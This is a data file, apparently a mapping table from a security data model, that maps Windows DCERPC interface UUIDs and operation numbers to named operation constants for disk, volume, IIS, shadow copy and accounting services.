70b51430-b6ca-11d0-b9b9-00a0c922e750:27 XDM_CONST.DCERPC_OPERATION_R_KEY_EXCHANGE_PHASE2
70b51430-b6ca-11d0-b9b9-00a0c922e750:28 XDM_CONST.DCERPC_OPERATION_BACKUP
70b51430-b6ca-11d0-b9b9-00a0c922e750:29 XDM_CONST.DCERPC_OPERATION_RESTORE
70b51430-b6ca-11d0-b9b9-00a0c922e750:30 XDM_CONST.DCERPC_OPERATION_ENUM_BACKUPS
70b51430-b6ca-11d0-b9b9-00a0c922e750:31 XDM_CONST.DCERPC_OPERATION_DELETE_BACKUP
70b51430-b6ca-11d0-b9b9-00a0c922e750:32 XDM_CONST.DCERPC_OPERATION_UNMARSHAL_INTERFACE
70b51430-b6ca-11d0-b9b9-00a0c922e750:33 XDM_CONST.DCERPC_OPERATION_R_GET_SERVER_GUID
82ad4280-036b-11cf-972c-00aa006887b0:0 XDM_CONST.DCERPC_OPERATION_R_INET_INFO_GET_VERSION
82ad4280-036b-11cf-972c-00aa006887b0:1 XDM_CONST.DCERPC_OPERATION_R_INET_INFO_GET_ADMIN_INFORMATION
82ad4280-036b-11cf-972c-00aa006887b0:2 XDM_CONST.DCERPC_OPERATION_R_INSET_INFO_GET_SITES
82ad4280-036b-11cf-972c-00aa006887b0:3 XDM_CONST.DCERPC_OPERATION_R_INET_INFO_SET_ADMIN_INFORMATION
82ad4280-036b-11cf-972c-00aa006887b0:4 XDM_CONST.DCERPC_OPERATION_R_INET_INFO_GET_GLOBAL_ADMIN_INFORMATION
82ad4280-036b-11cf-972c-00aa006887b0:5 XDM_CONST.DCERPC_OPERATION_R_INET_INFO_SET_GLOBAL_ADMIN_INFORMATION
82ad4280-036b-11cf-972c-00aa006887b0:6 XDM_CONST.DCERPC_OPERATION_R_INET_INFO_QUERY_STATISTICS
82ad4280-036b-11cf-972c-00aa006887b0:7 XDM_CONST.DCERPC_OPERATION_R_INET_INFO_CLEAR_STATISTICS
82ad4280-036b-11cf-972c-00aa006887b0:8 XDM_CONST.DCERPC_OPERATION_R_INET_INFO_FLUSH_MEMORY_CACHE
82ad4280-036b-11cf-972c-00aa006887b0:9 XDM_CONST.DCERPC_OPERATION_R_INET_INFO_GET_SERVER_CAPABILITIES
82ad4280-036b-11cf-972c-00aa006887b0:10 XDM_CONST.DCERPC_OPERATION_RW3_QUERY_STATISTICS2
82ad4280-036b-11cf-972c-00aa006887b0:11 XDM_CONST.DCERPC_OPERATION_RW3_CLEAR_STATISTICS2
82ad4280-036b-11cf-972c-00aa006887b0:12 XDM_CONST.DCERPC_OPERATION_R_FTP_QUERY_STATISTICS2
82ad4280-036b-11cf-972c-00aa006887b0:13 XDM_CONST.DCERPC_OPERATION_R_FTP_CLEAR_STATISTICS2
82ad4280-036b-11cf-972c-00aa006887b0:14 XDM_CONST.DCERPC_OPERATION_RIISD_ENUMERATE_USERS
82ad4280-036b-11cf-972c-00aa006887b0:15 XDM_CONST.DCERPC_OPERATION_RIIS_DISCONNECTED_USER
6619a740-8154-43be-a186-0319578e02db:7 XDM_CONST.DCERPC_OPERATION_REMOTE_DISPATCH_AUTO_DONE
6619a740-8154-43be-a186-0319578e02db:8 XDM_CONST.DCERPC_OPERATION_REMOTE_DISPATCH_NOT_AUTO_DONE
00000131-0000-0000-c000-000000000046:3 XDM_CONST.DCERPC_OPERATION_REM_QUERY_INTERFACE
00000131-0000-0000-c000-000000000046:4 XDM_CONST.DCERPC_OPERATION_REM_ADD_REF
00000131-0000-0000-c000-000000000046:5 XDM_CONST.DCERPC_OPERATION_REM_RELEASE
c5cebee2-9df5-4cdd-a08c-c2471bc144b4:7 XDM_CONST.DCERPC_OPERATION_RETRIEVE_EVENT_LIST
c5cebee2-9df5-4cdd-a08c-c2471bc144b4:8 XDM_CONST.DCERPC_OPERATION_GET_SYSTEM_AFFINITY
c5cebee2-9df5-4cdd-a08c-c2471bc144b4:9 XDM_CONST.DCERPC_OPERATION_IMPORT_XML_FILES
c5cebee2-9df5-4cdd-a08c-c2471bc144b4:10 XDM_CONST.DCERPC_OPERATION_EXPORT_XML_FILES
c5cebee2-9df5-4cdd-a08c-c2471bc144b4:11 XDM_CONST.DCERPC_OPERATION_RESTORE_XML_FILES
c5cebee2-9df5-4cdd-a08c-c2471bc144b4:12 XDM_CONST.DCERPC_OPERATION_GET_DEPENDENCIES
c5cebee2-9df5-4cdd-a08c-c2471bc144b4:13 XDM_CONST.DCERPC_OPERATION_GET_SERVICE_LIST
c5cebee2-9df5-4cdd-a08c-c2471bc144b4:14 XDM_CONST.DCERPC_OPERATION_GETLL_S_APP_POOL_NAMES
c5cebee2-9df5-4cdd-a08c-c2471bc144b4:15 XDM_CONST.DCERPC_OPERATION_GET_SERVER_NAME
c5cebee2-9df5-4cdd-a08c-c2471bc144b4:16 XDM_CONST.DCERPC_OPERATION_GET_CURRENT_MEMORY
2a3eb639-d134-422d-90d8-aaa1b5216202:7 XDM_CONST.DCERPC_OPERATION_EXPORT_OBJECTS
2a3eb639-d134-422d-90d8-aaa1b5216202:8 XDM_CONST.DCERPC_OPERATION_GET_IMPORT_CONFLICTS
2a3eb639-d134-422d-90d8-aaa1b5216202:9 XDM_CONST.DCERPC_OPERATION_IMPORT_XML
2a3eb639-d134-422d-90d8-aaa1b5216202:10 XDM_CONST.DCERPC_OPERATION_EXPORT_XML
b9785960-524f-11df-8b6d-83dcded72085:0 XDM_CONST.DCERPC_OPERATION_GET_KEY
e65e8028-83e8-491b-9af7-aaf6bd51a0ce:3 XDM_CONST.DCERPC_OPERATION_GET_REPORT
e65e8028-83e8-491b-9af7-aaf6bd51a0ce:4 XDM_CONST.DCERPC_OPERATION_GET_COMPRESSED_REPORT
e65e8028-83e8-491b-9af7-aaf6bd51a0ce:5 XDM_CONST.DCERPC_OPERATION_GET_RAW_REPORT_EX
e65e8028-83e8-491b-9af7-aaf6bd51a0ce:6 XDM_CONST.DCERPC_OPERATION_GET_REFERENCE_VERSION_VECTORS
e65e8028-83e8-491b-9af7-aaf6bd51a0ce:8 XDM_CONST.DCERPC_OPERATION_GET_REFERENCE_BACKLOG_COUNTS
20d15747-6c48-4254-a358-65039fd8c63c:9 XDM_CONST.DCERPC_OPERATION_GET_REPORT
20d15747-6c48-4254-a358-65039fd8c63c:16 XDM_CONST.DCERPC_OPERATION_GET_COMPRESSED_REPORT
8165b19e-8d3a-4d0b-80c8-97de310db583:3 XDM_CONST.DCERPC_OPERATION_GET_COMPONENT_INFO
112b1dff-d9dc-41f7-869f-d67fee7cb591:3 XDM_CONST.DCERPC_OPERATION_CREATE_VIRTUAL_SMART_CARD
112b1dff-d9dc-41f7-869f-d67fee7cb591:4 XDM_CONST.DCERPC_OPERATION_DESTROY_VIRTUAL_SMART_CARD
fdf8a2b9-02de-47f4-bc26-aa85ab5e5267:5 XDM_CONST.DCERPC_OPERATION_CREATE_VIRTUAL_SMART_CARD_WITH_PIN_POLICY
3c745a97-f375-4150-be17-5950f694c699:6 XDM_CONST.DCERPC_OPERATION_CREATE_VIRTUAL_SMART_CARD_WITH_ATTESTATION
1a1bb35f-abb8-451c-a1ae-33d98f1bef4a:3 XDM_CONST.DCERPC_OPERATION_REPORT_PROGRESS
1a1bb35f-abb8-451c-a1ae-33d98f1bef4a:4 XDM_CONST.DCERPC_OPERATION_REPORT_ERROR
d2d79df5-3400-11d0-b40b-00aa005ff586:3 XDM_CONST.DCERPC_OPERATION_ENUM_DISKS_EX
d2d79df5-3400-11d0-b40b-00aa005ff586:4 XDM_CONST.DCERPC_OPERATION_ENUM_DISK_REGIONS_EX
d2d79df5-3400-11d0-b40b-00aa005ff586:5 XDM_CONST.DCERPC_OPERATION_CREATE_PARTITION
d2d79df5-3400-11d0-b40b-00aa005ff586:6 XDM_CONST.DCERPC_OPERATION_CREATE_PARTITION_ASSIGN_AND_FORMAT
d2d79df5-3400-11d0-b40b-00aa005ff586:7 XDM_CONST.DCERPC_OPERATION_CREATE_PARTITION_ASSIGNAND_FORMAT_EX
d2d79df5-3400-11d0-b40b-00aa005ff586:8 XDM_CONST.DCERPC_OPERATION_DELETE_PARTITION
d2d79df5-3400-11d0-b40b-00aa005ff586:9 XDM_CONST.DCERPC_OPERATION_WRITE_SIGNATURE
d2d79df5-3400-11d0-b40b-00aa005ff586:10 XDM_CONST.DCERPC_OPERATION_MARK_ACTIVE_PARTITION
d2d79df5-3400-11d0-b40b-00aa005ff586:11 XDM_CONST.DCERPC_OPERATION_EJECT
d2d79df5-3400-11d0-b40b-00aa005ff586:13 XDM_CONST.DCERPC_OPERATION_FT_ENUM_VOLUMES
d2d79df5-3400-11d0-b40b-00aa005ff586:14 XDM_CONST.DCERPC_OPERATION_FT_ENUM_LOGICAL_DISK_MEMBERS
d2d79df5-3400-11d0-b40b-00aa005ff586:15 XDM_CONST.DCERPC_OPERATION_FT_DELETE_VOLUME
d2d79df5-3400-11d0-b40b-00aa005ff586:16 XDM_CONST.DCERPC_OPERATION_FT_BREAK_MIRROR
d2d79df5-3400-11d0-b40b-00aa005ff586:17 XDM_CONST.DCERPC_OPERATION_FT_RESYNC_MIRROR
d2d79df5-3400-11d0-b40b-00aa005ff586:18 XDM_CONST.DCERPC_OPERATION_FT_REGENERATE_PARITY_STRIPE
d2d79df5-3400-11d0-b40b-00aa005ff586:19 XDM_CONST.DCERPC_OPERATION_FT_REPLACE_MIRROR_PARTITION
d2d79df5-3400-11d0-b40b-00aa005ff586:20 XDM_CONST.DCERPC_OPERATION_FT_REPLACE_PARITY_STRIPE_PARTITION
d2d79df5-3400-11d0-b40b-00aa005ff586:21 XDM_CONST.DCERPC_OPERATION_ENUM_DRIVE_LETTERS
d2d79df5-3400-11d0-b40b-00aa005ff586:22 XDM_CONST.DCERPC_OPERATION_ASSIGN_DRIVE_LETTER
d2d79df5-3400-11d0-b40b-00aa005ff586:23 XDM_CONST.DCERPC_OPERATION_FREE_DRIVE_LETTER
d2d79df5-3400-11d0-b40b-00aa005ff586:24 XDM_CONST.DCERPC_OPERATION_ENUM_LOCAL_FILE_SYSTEMS
d2d79df5-3400-11d0-b40b-00aa005ff586:25 XDM_CONST.DCERPC_OPERATION_GET_INSTALLED_FILE_SYSTEMS
d2d79df5-3400-11d0-b40b-00aa005ff586:26 XDM_CONST.DCERPC_OPERATION_FORMAT
d2d79df5-3400-11d0-b40b-00aa005ff586:28 XDM_CONST.DCERPC_OPERATION_ENUM_VOLUMES
d2d79df5-3400-11d0-b40b-00aa005ff586:29 XDM_CONST.DCERPC_OPERATION_ENUM_VOLUME_MEMBERS
d2d79df5-3400-11d0-b40b-00aa005ff586:30 XDM_CONST.DCERPC_OPERATION_CREATE_VOLUME
d2d79df5-3400-11d0-b40b-00aa005ff586:31 XDM_CONST.DCERPC_OPERATION_CREATE_VOLUME_ASSIGN_AND_FORMAT
d2d79df5-3400-11d0-b40b-00aa005ff586:32 XDM_CONST.DCERPC_OPERATION_CREATE_VOLUME_ASSIGN_AND_FORMAT_EX
d2d79df5-3400-11d0-b40b-00aa005ff586:33 XDM_CONST.DCERPC_OPERATION_GET_VOLUME_MOUNT_NAME
d2d79df5-3400-11d0-b40b-00aa005ff586:34 XDM_CONST.DCERPC_OPERATION_GROW_VOLUME
d2d79df5-3400-11d0-b40b-00aa005ff586:35 XDM_CONST.DCERPC_OPERATION_DELETE_VOLUME
d2d79df5-3400-11d0-b40b-00aa005ff586:36 XDM_CONST.DCERPC_OPERATION_ADD_MIRROR
d2d79df5-3400-11d0-b40b-00aa005ff586:37 XDM_CONST.DCERPC_OPERATION_REMOVE_MIRROR
d2d79df5-3400-11d0-b40b-00aa005ff586:38 XDM_CONST.DCERPC_OPERATION_SPLIT_MIRROR
d2d79df5-3400-11d0-b40b-00aa005ff586:39 XDM_CONST.DCERPC_OPERATION_INITIALIZE_DISK_EX
d2d79df5-3400-11d0-b40b-00aa005ff586:40 XDM_CONST.DCERPC_OPERATION_UNINITIALIZE_DISK
d2d79df5-3400-11d0-b40b-00aa005ff586:41 XDM_CONST.DCERPC_OPERATION_RE_CONNECT_DISK
d2d79df5-3400-11d0-b40b-00aa005ff586:43 XDM_CONST.DCERPC_OPERATION_IMPORT_DISK_GROUP
d2d79df5-3400-11d0-b40b-00aa005ff586:44 XDM_CONST.DCERPC_OPERATION_DISK_MERGE_QUERY
d2d79df5-3400-11d0-b40b-00aa005ff586:45 XDM_CONST.DCERPC_OPERATION_DISK_MERGE
d2d79df5-3400-11d0-b40b-00aa005ff586:47 XDM_CONST.DCERPC_OPERATION_RE_ATTACH_DISK
d2d79df5-3400-11d0-b40b-00aa005ff586:51 XDM_CONST.DCERPC_OPERATION_REPLACE_RAID5_COLUMN
d2d79df5-3400-11d0-b40b-00aa005ff586:52 XDM_CONST.DCERPC_OPERATION_RESTART_VOLUME
d2d79df5-3400-11d0-b40b-00aa005ff586:53 XDM_CONST.DCERPC_OPERATION_GET_ENCAPSULATE_DISK_INFO_EX
d2d79df5-3400-11d0-b40b-00aa005ff586:54 XDM_CONST.DCERPC_OPERATION_ENCAPSULATE_DISK_EX
d2d79df5-3400-11d0-b40b-00aa005ff586:55 XDM_CONST.DCERPC_OPERATION_QUERY_CHANGE_PARTITION_NUMBERS
d2d79df5-3400-11d0-b40b-00aa005ff586:56 XDM_CONST.DCERPC_OPERATION_DELETE_PARTITION_NUMBER_INFO_FROM_REGISTRY
d2d79df5-3400-11d0-b40b-00aa005ff586:57 XDM_CONST.DCERPC_OPERATION_SET_DONT_SHOW
d2d79df5-3400-11d0-b40b-00aa005ff586:58 XDM_CONST.DCERPC_OPERATION_GET_DONT_SHOW
d2d79df5-3400-11d0-b40b-00aa005ff586:67 XDM_CONST.DCERPC_OPERATION_ENUM_TASKS
d2d79df5-3400-11d0-b40b-00aa005ff586:68 XDM_CONST.DCERPC_OPERATION_GET_TASK_DETAIL
d2d79df5-3400-11d0-b40b-00aa005ff586:69 XDM_CONST.DCERPC_OPERATION_ABORT_TASK
d2d79df5-3400-11d0-b40b-00aa005ff586:70 XDM_CONST.DCERPC_OPERATION_HR_GET_ERROR_DATA
d2d79df5-3400-11d0-b40b-00aa005ff586:71 XDM_CONST.DCERPC_OPERATION_INITIALIZE
d2d79df5-3400-11d0-b40b-00aa005ff586:72 XDM_CONST.DCERPC_OPERATION_UNINITIALIZE
d2d79df5-3400-11d0-b40b-00aa005ff586:73 XDM_CONST.DCERPC_OPERATION_REFRESH
d2d79df5-3400-11d0-b40b-00aa005ff586:74 XDM_CONST.DCERPC_OPERATION_RESCAN_DISKS
d2d79df5-3400-11d0-b40b-00aa005ff586:75 XDM_CONST.DCERPC_OPERATION_REFRESH_FILE_SYS
d2d79df5-3400-11d0-b40b-00aa005ff586:76 XDM_CONST.DCERPC_OPERATION_SECURE_SYSTEM_PARTITION
d2d79df5-3400-11d0-b40b-00aa005ff586:77 XDM_CONST.DCERPC_OPERATION_SHUT_DOWN_SYSTEM
d2d79df5-3400-11d0-b40b-00aa005ff586:78 XDM_CONST.DCERPC_OPERATION_ENUM_ACCESS_PATH
d2d79df5-3400-11d0-b40b-00aa005ff586:79 XDM_CONST.DCERPC_OPERATION_ENUM_ACCESS_PATH_FOR_VOLUME
d2d79df5-3400-11d0-b40b-00aa005ff586:80 XDM_CONST.DCERPC_OPERATION_ADD_ACCESS_PATH
d2d79df5-3400-11d0-b40b-00aa005ff586:81 XDM_CONST.DCERPC_OPERATION_DELETE_ACCESS_PATH
4bdafc52-fe6a-11d2-93f8-00105a11164a:3 XDM_CONST.DCERPC_OPERATION_GET_MAX_ADJUSTED_FREE_SPACE
135698d2-3a37-4d26-99df-e2bb6ae3ac61:3 XDM_CONST.DCERPC_OPERATION_ENUM_DISKS_EX
135698d2-3a37-4d26-99df-e2bb6ae3ac61:4 XDM_CONST.DCERPC_OPERATION_ENUM_DISK_REGIONS_EX
135698d2-3a37-4d26-99df-e2bb6ae3ac61:5 XDM_CONST.DCERPC_OPERATION_CREATE_PARTITION
135698d2-3a37-4d26-99df-e2bb6ae3ac61:6 XDM_CONST.DCERPC_OPERATION_CREATE_PARTITION_ASSIGN_AND_FORMAT
135698d2-3a37-4d26-99df-e2bb6ae3ac61:7 XDM_CONST.DCERPC_OPERATION_CREATE_PARTITION_ASSIGNAND_FORMAT_EX
135698d2-3a37-4d26-99df-e2bb6ae3ac61:8 XDM_CONST.DCERPC_OPERATION_DELETE_PARTITION
135698d2-3a37-4d26-99df-e2bb6ae3ac61:9 XDM_CONST.DCERPC_OPERATION_INITIALIZE_DISK_STYLE
135698d2-3a37-4d26-99df-e2bb6ae3ac61:10 XDM_CONST.DCERPC_OPERATION_MARK_ACTIVE_PARTITION
135698d2-3a37-4d26-99df-e2bb6ae3ac61:11 XDM_CONST.DCERPC_OPERATION_EJECT
135698d2-3a37-4d26-99df-e2bb6ae3ac61:13 XDM_CONST.DCERPC_OPERATION_FT_ENUM_VOLUMES
135698d2-3a37-4d26-99df-e2bb6ae3ac61:14 XDM_CONST.DCERPC_OPERATION_FT_ENUM_LOGICAL_DISK_MEMBERS
135698d2-3a37-4d26-99df-e2bb6ae3ac61:15 XDM_CONST.DCERPC_OPERATION_FT_DELETE_VOLUME
135698d2-3a37-4d26-99df-e2bb6ae3ac61:16 XDM_CONST.DCERPC_OPERATION_FT_BREAK_MIRROR
135698d2-3a37-4d26-99df-e2bb6ae3ac61:17 XDM_CONST.DCERPC_OPERATION_FT_RESYNC_MIRROR
135698d2-3a37-4d26-99df-e2bb6ae3ac61:18 XDM_CONST.DCERPC_OPERATION_FT_REGENERATE_PARITY_STRIPE
135698d2-3a37-4d26-99df-e2bb6ae3ac61:19 XDM_CONST.DCERPC_OPERATION_FT_REPLACE_MIRROR_PARTITION
135698d2-3a37-4d26-99df-e2bb6ae3ac61:20 XDM_CONST.DCERPC_OPERATION_FT_REPLACE_PARITY_STRIPE_PARTITION
135698d2-3a37-4d26-99df-e2bb6ae3ac61:21 XDM_CONST.DCERPC_OPERATION_ENUM_DRIVE_LETTERS
135698d2-3a37-4d26-99df-e2bb6ae3ac61:22 XDM_CONST.DCERPC_OPERATION_ASSIGN_DRIVE_LETTER
135698d2-3a37-4d26-99df-e2bb6ae3ac61:23 XDM_CONST.DCERPC_OPERATION_FREE_DRIVE_LETTER
135698d2-3a37-4d26-99df-e2bb6ae3ac61:24 XDM_CONST.DCERPC_OPERATION_ENUM_LOCAL_FILE_SYSTEMS
135698d2-3a37-4d26-99df-e2bb6ae3ac61:25 XDM_CONST.DCERPC_OPERATION_GET_INSTALLED_FILE_SYSTEMS
135698d2-3a37-4d26-99df-e2bb6ae3ac61:26 XDM_CONST.DCERPC_OPERATION_FORMAT
135698d2-3a37-4d26-99df-e2bb6ae3ac61:27 XDM_CONST.DCERPC_OPERATION_ENUM_VOLUMES
135698d2-3a37-4d26-99df-e2bb6ae3ac61:28 XDM_CONST.DCERPC_OPERATION_ENUM_VOLUME_MEMBERS
135698d2-3a37-4d26-99df-e2bb6ae3ac61:29 XDM_CONST.DCERPC_OPERATION_CREATE_VOLUME
135698d2-3a37-4d26-99df-e2bb6ae3ac61:30 XDM_CONST.DCERPC_OPERATION_CREATE_VOLUME_ASSIGN_AND_FORMAT
135698d2-3a37-4d26-99df-e2bb6ae3ac61:31 XDM_CONST.DCERPC_OPERATION_CREATE_VOLUME_ASSIGN_AND_FORMAT_EX
135698d2-3a37-4d26-99df-e2bb6ae3ac61:32 XDM_CONST.DCERPC_OPERATION_GET_VOLUME_MOUNT_NAME
135698d2-3a37-4d26-99df-e2bb6ae3ac61:33 XDM_CONST.DCERPC_OPERATION_GROW_VOLUME
135698d2-3a37-4d26-99df-e2bb6ae3ac61:34 XDM_CONST.DCERPC_OPERATION_DELETE_VOLUME
135698d2-3a37-4d26-99df-e2bb6ae3ac61:35 XDM_CONST.DCERPC_OPERATION_CREATE_PARTITIONS_FOR_VOLUME
135698d2-3a37-4d26-99df-e2bb6ae3ac61:36 XDM_CONST.DCERPC_OPERATION_DELETE_PARTITIONS_FOR_VOLUME
135698d2-3a37-4d26-99df-e2bb6ae3ac61:37 XDM_CONST.DCERPC_OPERATION_GET_MAX_ADJUSTED_FREE_SPACE
135698d2-3a37-4d26-99df-e2bb6ae3ac61:38 XDM_CONST.DCERPC_OPERATION_ADD_MIRROR
135698d2-3a37-4d26-99df-e2bb6ae3ac61:39 XDM_CONST.DCERPC_OPERATION_REMOVE_MIRROR
135698d2-3a37-4d26-99df-e2bb6ae3ac61:40 XDM_CONST.DCERPC_OPERATION_SPLIT_MIRROR
135698d2-3a37-4d26-99df-e2bb6ae3ac61:41 XDM_CONST.DCERPC_OPERATION_INITIALIZE_DISK_EX
135698d2-3a37-4d26-99df-e2bb6ae3ac61:42 XDM_CONST.DCERPC_OPERATION_UNINITIALIZE_DISK
135698d2-3a37-4d26-99df-e2bb6ae3ac61:43 XDM_CONST.DCERPC_OPERATION_RE_CONNECT_DISK
135698d2-3a37-4d26-99df-e2bb6ae3ac61:44 XDM_CONST.DCERPC_OPERATION_IMPORT_DISK_GROUP
135698d2-3a37-4d26-99df-e2bb6ae3ac61:45 XDM_CONST.DCERPC_OPERATION_DISK_MERGE_QUERY
135698d2-3a37-4d26-99df-e2bb6ae3ac61:46 XDM_CONST.DCERPC_OPERATION_DISK_MERGE
135698d2-3a37-4d26-99df-e2bb6ae3ac61:47 XDM_CONST.DCERPC_OPERATION_RE_ATTACH_DISK
135698d2-3a37-4d26-99df-e2bb6ae3ac61:48 XDM_CONST.DCERPC_OPERATION_REPLACE_RAID5_COLUMN
135698d2-3a37-4d26-99df-e2bb6ae3ac61:49 XDM_CONST.DCERPC_OPERATION_RESTART_VOLUME
135698d2-3a37-4d26-99df-e2bb6ae3ac61:50 XDM_CONST.DCERPC_OPERATION_GET_ENCAPSULATE_DISK_INFO_EX
135698d2-3a37-4d26-99df-e2bb6ae3ac61:51 XDM_CONST.DCERPC_OPERATION_ENCAPSULATE_DISK_EX
135698d2-3a37-4d26-99df-e2bb6ae3ac61:52 XDM_CONST.DCERPC_OPERATION_QUERY_CHANGE_PARTITION_NUMBERS
135698d2-3a37-4d26-99df-e2bb6ae3ac61:53 XDM_CONST.DCERPC_OPERATION_DELETE_PARTITION_NUMBER_INFO_FROM_REGISTRY
135698d2-3a37-4d26-99df-e2bb6ae3ac61:54 XDM_CONST.DCERPC_OPERATION_SET_DONT_SHOW
135698d2-3a37-4d26-99df-e2bb6ae3ac61:55 XDM_CONST.DCERPC_OPERATION_GET_DONT_SHOW
135698d2-3a37-4d26-99df-e2bb6ae3ac61:64 XDM_CONST.DCERPC_OPERATION_ENUM_TASKS
135698d2-3a37-4d26-99df-e2bb6ae3ac61:65 XDM_CONST.DCERPC_OPERATION_GET_TASK_DETAIL
135698d2-3a37-4d26-99df-e2bb6ae3ac61:66 XDM_CONST.DCERPC_OPERATION_ABORT_TASK
135698d2-3a37-4d26-99df-e2bb6ae3ac61:67 XDM_CONST.DCERPC_OPERATION_HR_GET_ERROR_DATA
135698d2-3a37-4d26-99df-e2bb6ae3ac61:68 XDM_CONST.DCERPC_OPERATION_INITIALIZE
135698d2-3a37-4d26-99df-e2bb6ae3ac61:69 XDM_CONST.DCERPC_OPERATION_UNINITIALIZE
135698d2-3a37-4d26-99df-e2bb6ae3ac61:70 XDM_CONST.DCERPC_OPERATION_REFRESH
135698d2-3a37-4d26-99df-e2bb6ae3ac61:71 XDM_CONST.DCERPC_OPERATION_RESCAN_DISKS
135698d2-3a37-4d26-99df-e2bb6ae3ac61:72 XDM_CONST.DCERPC_OPERATION_REFRESH_FILE_SYS
135698d2-3a37-4d26-99df-e2bb6ae3ac61:73 XDM_CONST.DCERPC_OPERATION_SECURE_SYSTEM_PARTITION
135698d2-3a37-4d26-99df-e2bb6ae3ac61:74 XDM_CONST.DCERPC_OPERATION_SHUT_DOWN_SYSTEM
135698d2-3a37-4d26-99df-e2bb6ae3ac61:75 XDM_CONST.DCERPC_OPERATION_ENUM_ACCESS_PATH
135698d2-3a37-4d26-99df-e2bb6ae3ac61:76 XDM_CONST.DCERPC_OPERATION_ENUM_ACCESS_PATH_FOR_VOLUME
135698d2-3a37-4d26-99df-e2bb6ae3ac61:77 XDM_CONST.DCERPC_OPERATION_ADD_ACCESS_PATH
135698d2-3a37-4d26-99df-e2bb6ae3ac61:78 XDM_CONST.DCERPC_OPERATION_DELETE_ACCESS_PATH
deb01010-3a37-4d26-99df-e2bb6ae3ac61:3 XDM_CONST.DCERPC_OPERATION_REFRESH_EX
deb01010-3a37-4d26-99df-e2bb6ae3ac61:4 XDM_CONST.DCERPC_OPERATION_GET_VOLUME_DEVICE_NAME
214a0f28-b737-4026-b847-4f9e37d79529:3 XDM_CONST.DCERPC_OPERATION_ADD_DIFF_AREA
214a0f28-b737-4026-b847-4f9e37d79529:4 XDM_CONST.DCERPC_OPERATION_CHANGE_DIFF_AREA_MAXIMIZE_SIZE
214a0f28-b737-4026-b847-4f9e37d79529:5 XDM_CONST.DCERPC_OPERATION_QUERY_VOLUMES_SUPPORTED_FOR_DIFF_AREAS
214a0f28-b737-4026-b847-4f9e37d79529:6 XDM_CONST.DCERPC_OPERATION_QUERY_DIFF_AREAS_FOR_VOLUME
214a0f28-b737-4026-b847-4f9e37d79529:7 XDM_CONST.DCERPC_OPERATION_QUERY_DIFF_AREA_ON_VOLUME
01954e6b-9254-4e6e-808c-c9e05d007696:3 XDM_CONST.DCERPC_OPERATION_NEXT
01954e6b-9254-4e6e-808c-c9e05d007696:4 XDM_CONST.DCERPC_OPERATION_SKIP
01954e6b-9254-4e6e-808c-c9e05d007696:5 XDM_CONST.DCERPC_OPERATION_RESET
01954e6b-9254-4e6e-808c-c9e05d007696:6 XDM_CONST.DCERPC_OPERATION_CLONE
ae1c7110-2f60-11d3-8a39-00c04f72d8e3:3 XDM_CONST.DCERPC_OPERATION_NEXT
ae1c7110-2f60-11d3-8a39-00c04f72d8e3:4 XDM_CONST.DCERPC_OPERATION_SKIP
ae1c7110-2f60-11d3-8a39-00c04f72d8e3:5 XDM_CONST.DCERPC_OPERATION_RESET
ae1c7110-2f60-11d3-8a39-00c04f72d8e3:6 XDM_CONST.DCERPC_OPERATION_CLONE
fa7df749-66e7-4986-a27f-e2f04ae53772:3 XDM_CONST.DCERPC_OPERATION_GET_PROVIDER_MGMT_INTERFACE
fa7df749-66e7-4986-a27f-e2f04ae53772:4 XDM_CONST.DCERPC_OPERATION_QUERY_VOLUMES_SUPPORTED_FOR_SNAPSHOTS
fa7df749-66e7-4986-a27f-e2f04ae53772:5 XDM_CONST.DCERPC_OPERATION_QUERY_SNAPSHOTS_BY_VOLUME
29822ab7-f302-11d0-9953-00c04fd919c1:3 XDM_CONST.DCERPC_OPERATION_APP_CREATE
29822ab7-f302-11d0-9953-00c04fd919c1:4 XDM_CONST.DCERPC_OPERATION_APP_DELETE
29822ab7-f302-11d0-9953-00c04fd919c1:5 XDM_CONST.DCERPC_OPERATION_APP_UN_LOAD
29822ab7-f302-11d0-9953-00c04fd919c1:6 XDM_CONST.DCERPC_OPERATION_APP_GET_STATUS
29822ab7-f302-11d0-9953-00c04fd919c1:7 XDM_CONST.DCERPC_OPERATION_APP_DELETE_RECOVERABLE
29822ab7-f302-11d0-9953-00c04fd919c1:8 XDM_CONST.DCERPC_OPERATION_APP_RECOVER
29822ab8-f302-11d0-9953-00c04fd919c1:9 XDM_CONST.DCERPC_OPERATION_APP_CREATE2
4f7ca01c-a9e5-45b6-b142-2332a1339c1d:7 XDM_CONST.DCERPC_OPERATION_CREATE_ACCOUNTING_DB
4f7ca01c-a9e5-45b6-b142-2332a1339c1d:8 XDM_CONST.DCERPC_OPERATION_GET_ACCOUNTING_METADATA
4f7ca01c-a9e5-45b6-b142-2332a1339c1d:9 XDM_CONST.DCERPC_OPERATION_EXECUTE_ACCOUNTING_QUERY
4f7ca01c-a9e5-45b6-b142-2332a1339c1d:10 XDM_CONST.DCERPC_OPERATION_GET_RAW_ACCOUNTING_DATA
4f7ca01c-a9e5-45b6-b142-2332a1339c1d:11 XDM_CONST.DCERPC_OPERATION_GET_NEXT_ACCOUNTING_DATA_BATCH
4f7ca01c-a9e5-45b6-b142-2332a1339c1d:12 XDM_CONST.DCERPC_OPERATION_DELETE_ACCOUNTING_DATA
4f7ca01c-a9e5-45b6-b142-2332a1339c1d:13 XDM_CONST.DCERPC_OPERATION_DEFRAGMENT_DB
4f7ca01c-a9e5-45b6-b142-2332a1339c1d:14 XDM_CONST.DCERPC_OPERATION_CANCEL_ACCOUNTING_QUERY
4f7ca01c-a9e5-45b6-b142-2332a1339c1d:15 XDM_CONST.DCERPC_OPERATION_REGISTER_ACCOUNTING_CLIENT
4f7ca01c-a9e5-45b6-b142-2332a1339c1d:16 XDM_CONST.DCERPC_OPERATION_DUMP_ACCOUNTING_DATA
4f7ca01c-a9e5-45b6-b142-2332a1339c1d:17 XDM_CONST.DCERPC_OPERATION_GET_ACCOUNTING_CLIENTS
4f7ca01c-a9e5-45b6-b142-2332a1339c1d:18 XDM_CONST.DCERPC_OPERATION_SET_ACCOUNTING_CLIENT_STATUS
4f7ca01c-a9e5-45b6-b142-2332a1339c1d:19 XDM_CONST.DCERPC_OPERATION_CHECK_ACCOUNTING_CONNECTION
4f7ca01c-a9e5-45b6-b142-2332a1339c1d:20 XDM_CONST.DCERPC_OPERATION_SET_CLIENT_PERMISSIONS
481e06cf-ab04-4498-8ffe-124a0a34296d:7 XDM_CONST.DCERPC_OPERATION_GET_CALENDAR_INFO
481e06cf-ab04-4498-8ffe-124a0a34296d:8 XDM_CONST.DCERPC_OPERATION_CREATE_CALENDAR
481e06cf-ab04-4498-8ffe-124a0a34296d:9 XDM_CONST.DCERPC_OPERATION_MODIFY_CALENDAR
